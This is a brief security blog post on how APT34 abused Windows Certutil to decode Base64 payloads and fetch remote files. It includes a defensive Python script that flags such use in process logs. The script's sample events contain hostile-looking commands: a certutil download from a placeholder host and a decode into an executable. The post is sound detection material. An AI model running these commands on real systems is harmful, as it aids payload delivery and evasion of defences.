Certutil module #APT34

Many attacks in recent years, such as the #APT34 campaigns, have used the Certutil module, because Certutil has two features that are very attractive to attackers.

Certutil is a command-line tool, designed by Microsoft, for managing and installing custom certificates on Windows, and it is installed by default on Windows operating systems.

The two features of this module are: first, Certutil can decode Base64-encoded values, so using Certutil instead of a hand-written decoder in the attacker's payload is a very convenient option; second, Certutil can download a plain-text file from an external (DNS-resolved) address and save it for us.
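Both features described above show up in process-creation telemetry as distinctive certutil command lines (`-decode`/`-decodehex`, `-urlcache` with a URL, and the counterpart `-encode`). The following detection script is an added example written for this post, not code from the original or from any tool it mentions; the event records, hosts and paths are constructed placeholders, and the finding labels (`decode-to-file`, `remote-download`, `encode-to-base64`) are names chosen here.

```python
import re

# Constructed sample process-creation records (simplified Sysmon Event ID 1 fields).
# Hosts, paths and file names are made-up placeholders, not observed indicators.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil -urlcache -split -f http://files.example.invalid/update.txt C:\Users\Public\update.txt"},
    {"pid": 4133, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'certutil -decode "C:\Users\Public\update.txt" C:\Users\Public\update.exe'},
    {"pid": 5001, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"certutil -store my"},
    {"pid": 5010, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\System32\certutil.exe /encode C:\temp\report.docx C:\temp\report.b64"},
    {"pid": 5020, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell -c Get-Date"},
]

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".scr", ".ps1", ".bat", ".vbs", ".js", ".hta")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def analyze_certutil(cmdline):
    """Return (technique, detail) findings for one command line; [] if not certutil or benign."""
    toks = tokenize(cmdline)
    if not toks:
        return []
    # Match on the image name only, whether it was invoked by name or full path.
    image = toks[0].lower().rsplit("\\", 1)[-1]
    if image not in ("certutil", "certutil.exe"):
        return []
    # certutil accepts both "-flag" and "/flag"; everything else is a positional argument.
    flags = {t[1:].lower() for t in toks[1:] if t[:1] in ("-", "/")}
    args = [t for t in toks[1:] if t[:1] not in ("-", "/")]
    findings = []
    # Feature 1 from the post: Base64 (or hex) decoding straight to a file on disk.
    if flags & {"decode", "decodehex"}:
        detail = f"{args[0]} -> {args[1]}" if len(args) >= 2 else " ".join(args)
        if len(args) >= 2 and args[1].lower().endswith(EXEC_EXT):
            detail += " (decoded output is executable)"
        findings.append(("decode-to-file", detail))
    # Feature 2 from the post: fetching a remote file via the URL cache.
    urls = [a for a in args if URL_RE.match(a)]
    if "urlcache" in flags or urls:
        findings.append(("remote-download", urls[0] if urls else " ".join(args)))
    # Counterpart of feature 1: encoding local data to Base64 (staging before transfer).
    if "encode" in flags:
        findings.append(("encode-to-base64", " ".join(args)))
    return findings


def scan_events(events):
    """Return one alert per suspicious certutil event: {pid, parent, findings}."""
    alerts = []
    for ev in events:
        findings = analyze_certutil(ev["cmdline"])
        if findings:
            alerts.append({"pid": ev["pid"], "parent": ev["parent"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        for technique, detail in a["findings"]:
            print(f"pid={a['pid']} parent={a['parent']} {technique}: {detail}")
```

Running it over the constructed events flags the download, the decode (whose output is an executable) and the encode, while the ordinary `certutil -store my` query passes silently; in a real pipeline the parent process and the decoded file's extension are the fields worth weighting, since legitimate certificate management rarely decodes into `.exe` under a shell parent.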

The purpose of this post was not just to describe CertUtil, but rather to use this module as a pretext for focusing on the default services of Windows operating systems, which provide creative ways of bypassing detection mechanisms.